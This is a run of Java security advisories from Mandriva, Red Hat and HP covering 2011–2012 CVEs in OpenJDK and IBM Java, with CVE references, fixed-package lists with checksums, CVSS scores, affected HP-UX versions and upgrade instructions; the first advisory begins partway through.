http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3377 _______________________________________________________________________ Updated Packages: Mandriva Linux 2010.1: 2881c71d1da084f6c7a136335f5383d6 2010.1/i586/icedtea-web-1.0.6-0.1mdv2010.2.i586.rpm 415d7598363639aecbafd380827b7ab2 2010.1/i586/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdv2010.2.i586.rpm 27d2d84f2a00e4d18cb68e8c8ecd1626 2010.1/i586/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1mdv2010.2.i586.rpm 8b4b727a2139d866d0e88ff720de9b57 2010.1/i586/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1mdv2010.2.i586.rpm 8084b3aaeac98db2ddf89913db805725 2010.1/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1mdv2010.2.i586.rpm f5c32405224455a5065d85ecbba6f1f2 2010.1/i586/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1mdv2010.2.i586.rpm 45fd80b86f46b8e9ca3711c47d4fbb40 2010.1/SRPMS/icedtea-web-1.0.6-0.1mdv2010.2.src.rpm 6bbb0d8c0e0ce847b86d9145ca12e211 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 899e54445bf4ad65ea254e835006ce27 2010.1/x86_64/icedtea-web-1.0.6-0.1mdv2010.2.x86_64.rpm 7da63e6b6d83974f32f6580c4de53929 2010.1/x86_64/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdv2010.2.x86_64.rpm 859e838ff8583b814f1270c36d0bf248 2010.1/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1mdv2010.2.x86_64.rpm 8da61ef538893c8b7766e868e369f400 2010.1/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1mdv2010.2.x86_64.rpm 3b56e8612ba71e92e728e3e1a9fef319 2010.1/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1mdv2010.2.x86_64.rpm 23eea5b9bf1a2ee3db0ebf0c6927234a 2010.1/x86_64/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1mdv2010.2.x86_64.rpm 45fd80b86f46b8e9ca3711c47d4fbb40 2010.1/SRPMS/icedtea-web-1.0.6-0.1mdv2010.2.src.rpm 6bbb0d8c0e0ce847b86d9145ca12e211 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdv2010.2.src.rpm Mandriva Linux 2011: b585d6580568d064d9e99ab2d8898dbb 2011/i586/icedtea-web-1.0.6-0.1-mdv2011.0.i586.rpm 17ea4db995836efdb63f62370adc21f3 2011/i586/java-1.6.0-openjdk-1.6.0.0-24.b22.1-mdv2011.0.i586.rpm b5b625dd4b96e479ce532f2d578650bb 2011/i586/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1-mdv2011.0.i586.rpm 3bc34e225ec9e6b38dd1876a5c5ffe6d 2011/i586/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1-mdv2011.0.i586.rpm 050f5c111f9e65c0ea06f80e4ffff35d 2011/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1-mdv2011.0.i586.rpm 3d5eed0e210b9d4e38a6dcd74929f0dd 2011/i586/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1-mdv2011.0.i586.rpm 0579fb909e08a0f420183284ba7061e9 2011/SRPMS/icedtea-web-1.0.6-0.1.src.rpm 128cec9fdd9fd0e0d921341f178be9a1 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1.src.rpm Mandriva Linux 2011/X86_64: aa77ab19c7746723530e3a696fd4355a 2011/x86_64/icedtea-web-1.0.6-0.1-mdv2011.0.x86_64.rpm 467cc14261ed055450afbf1a2a5fe483 2011/x86_64/java-1.6.0-openjdk-1.6.0.0-24.b22.1-mdv2011.0.x86_64.rpm 2850bfa26b1f992dff3c2c1ac3f1326b 2011/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1-mdv2011.0.x86_64.rpm 50053850cfdd573a9469aa0b5783cc82 2011/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1-mdv2011.0.x86_64.rpm 04ba44e392bf335e86fdc2c66d03bdf3 2011/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1-mdv2011.0.x86_64.rpm 678776c021e19498a6e201c9b0ef6513 2011/x86_64/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1-mdv2011.0.x86_64.rpm 0579fb909e08a0f420183284ba7061e9 2011/SRPMS/icedtea-web-1.0.6-0.1.src.rpm 128cec9fdd9fd0e0d921341f178be9a1 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1.src.rpm Mandriva Enterprise Server 5: c6af60f8fac7b8fb91a79983e4c68364 mes5/i586/icedtea-web-1.0.6-0.1mdvmes5.2.i586.rpm 00295911ed1610030bd0b39680c2fb20 mes5/i586/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdvmes5.2.i586.rpm bdcd904e1e04d57f8205904b84dd5971 mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1mdvmes5.2.i586.rpm 960da26357c48af97ca8e9cdb4245692 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1mdvmes5.2.i586.rpm 8cf1ac9ad06eddba1916d8e4e2b3cedf mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1mdvmes5.2.i586.rpm f0a00b845915e25e7b4bc9802914aee4 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1mdvmes5.2.i586.rpm 3860e9d27e8bc15ea72a57deb811c961 mes5/SRPMS/icedtea-web-1.0.6-0.1mdvmes5.2.src.rpm b0701aff2a8ffdcc27a6cd7560d0d099 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 765023a21377d664c2ba05e98147dd1b mes5/x86_64/icedtea-web-1.0.6-0.1mdvmes5.2.x86_64.rpm f0b699b476a124eb0a1b2f5187101de9 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdvmes5.2.x86_64.rpm 249ffd15ed12d64798ff39431e402d69 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1mdvmes5.2.x86_64.rpm d747f2b1361c0a67d4d85824a94d0a69 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1mdvmes5.2.x86_64.rpm d50d63017beb08a2f23d08138a17c992 mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1mdvmes5.2.x86_64.rpm dd36ff4d9b91a541dfa86bb46288bbe0 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-24.b22.1mdvmes5.2.x86_64.rpm 3860e9d27e8bc15ea72a57deb811c961 mes5/SRPMS/icedtea-web-1.0.6-0.1mdvmes5.2.src.rpm b0701aff2a8ffdcc27a6cd7560d0d099 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-24.b22.1mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOvSWxmqjQ0CJFipgRAnk1AKDUddZYCqwkfhoUpLxEL0BT3mDf0ACfbuTI aaF2JGTyfceBABs92un/yVA= =yPsD -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Desktop version 4 Extras - i386, x86_64 Red Hat Enterprise Linux AS version 4 Extras - i386, ia64, ppc, s390, s390x, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux ES version 4 Extras - i386, ia64, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux WS version 4 Extras - i386, ia64, x86_64 3. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section. (CVE-2011-3389, CVE-2011-3545, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3552, CVE-2011-3556, CVE-2011-3557, CVE-2011-3560) All users of java-1.4.2-ibm are advised to upgrade to these updated packages, which contain the IBM Java 1.4.2 SR13-FP11 release. All running instances of IBM Java must be restarted for this update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 737506 - CVE-2011-3389 HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST) 745379 - CVE-2011-3560 OpenJDK: missing checkSetFactory calls in HttpsURLConnection (JSSE, 7096936) 745387 - CVE-2011-3547 OpenJDK: InputStream skip() information leak (Networking/IO, 7000600) 745397 - CVE-2011-3552 OpenJDK: excessive default UDP socket limit under SecurityManager (Networking, 7032417) 745459 - CVE-2011-3556 OpenJDK: RMI DGC server remote code execution (RMI, 7077466) 745464 - CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012) 745473 - CVE-2011-3548 OpenJDK: mutable static AWTKeyStroke.ctor (AWT, 7019773) 747191 - CVE-2011-3545 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Sound) 747198 - CVE-2011-3549 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Swing) 6. Package List: Red Hat Enterprise Linux AS version 4 Extras: i386: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.i386.rpm ia64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.ia64.rpm ppc: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.ppc64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.ppc64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.ppc64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.ppc64.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.ppc.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.ppc64.rpm s390: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.s390.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.s390.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.s390.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.s390.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.s390.rpm s390x: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.s390x.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.s390x.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.s390x.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.s390x.rpm x86_64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.x86_64.rpm Red Hat Desktop version 4 Extras: i386: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.i386.rpm x86_64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux ES version 4 Extras: i386: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.i386.rpm ia64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.ia64.rpm x86_64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux WS version 4 Extras: i386: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el4.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.i386.rpm ia64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.ia64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.ia64.rpm x86_64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el4.x86_64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.i386.rpm ia64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ia64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ia64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ia64.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ia64.rpm ppc: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ppc64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ppc64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ppc64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.ppc64.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ppc.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ppc64.rpm s390x: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.s390.rpm java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.s390x.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.s390.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.s390x.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.s390.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.s390x.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.s390.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.s390.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.s390x.rpm x86_64: java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.x86_64.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.x86_64.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.x86_64.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.x86_64.rpm java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.i386.rpm java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPC0nZXlSAg2UNWIIRAv1RAKCl92qrTYYU1hbGCfxx4pg/qqVM2gCcDbOP 1GEavw104zEMlVmzCOrcfx4= =j7JJ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Release Date: 2012-05-15 Last Updated: 2012-05-15 - ----------------------------------------------------------------------------- Potential Security Impact: Remote Denial of service, unauthorized modification and disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities may allow remote Denial of Service (DoS), unauthorized modification and disclosure of information. References: CVE-2010-4447, CVE-2010-4448, CVE-2010-4454, CVE-2010-4462, CVE-2010-4465, CVE-2010-4469, CVE-2010-4473, CVE-2010-4475, CVE-2010-4476, CVE-2011-0802, CVE-2011-0814, CVE-2011-0815, CVE-2011-0862, CVE-2011-0864, CVE-2011-0865, CVE-2011-0867, CVE-2011-0871, CVE-2011-3389, CVE-2011-3545, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3552, CVE-2011-3556, CVE-2011-3557, CVE-2011-3560, CVE-2011-3563, CVE-2012-0499, CVE-2012-0502, CVE-2012-0503, CVE-2012-0505, CVE-2012-0506 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2010-4447 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2010-4448 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2010-4454 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2010-4462 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2010-4465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2010-4469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2010-4473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2010-4475 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-0802 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-0814 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-0815 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-0862 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-0864 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-0865 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2011-0867 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-0871 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-3545 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3547 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3548 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3549 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3552 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2011-3556 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3557 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3560 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2011-3563 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2012-0499 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0502 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2012-0503 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0505 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0506 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP is providing the following Java updates to resolve the vulnerabilities. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 =========== Jpi14.JPI14-COM Jpi14.JPI14-COM-DOC Jpi14.JPI14-IPF32 Jpi14.JPI14-PA11 Jdk14.JDK14-COM Jdk14.JDK14-DEMO Jdk14.JDK14-IPF32 Jdk14.JDK14-IPF64 Jdk14.JDK14-PA11 Jdk14.JDK14-PA20 Jdk14.JDK14-PA20W Jdk14.JDK14-PNV2 Jdk14.JDK14-PWV2 Jre14.JRE14-COM Jre14.JRE14-COM-DOC Jre14.JRE14-IPF32 Jre14.JRE14-IPF32-HS Jre14.JRE14-IPF64 Jre14.JRE14-IPF64-HS Jre14.JRE14-PA11 Jre14.JRE14-PA11-HS Jre14.JRE14-PA20 Jre14.JRE14-PA20-HS Jre14.JRE14-PA20W Jre14.JRE14-PA20W-HS Jre14.JRE14-PNV2 Jre14.JRE14-PNV2-H Jre14.JRE14-PWV2 Jre14.JRE14-PWV2-H action: install revision 1.4.2.28.00 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 15 May 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
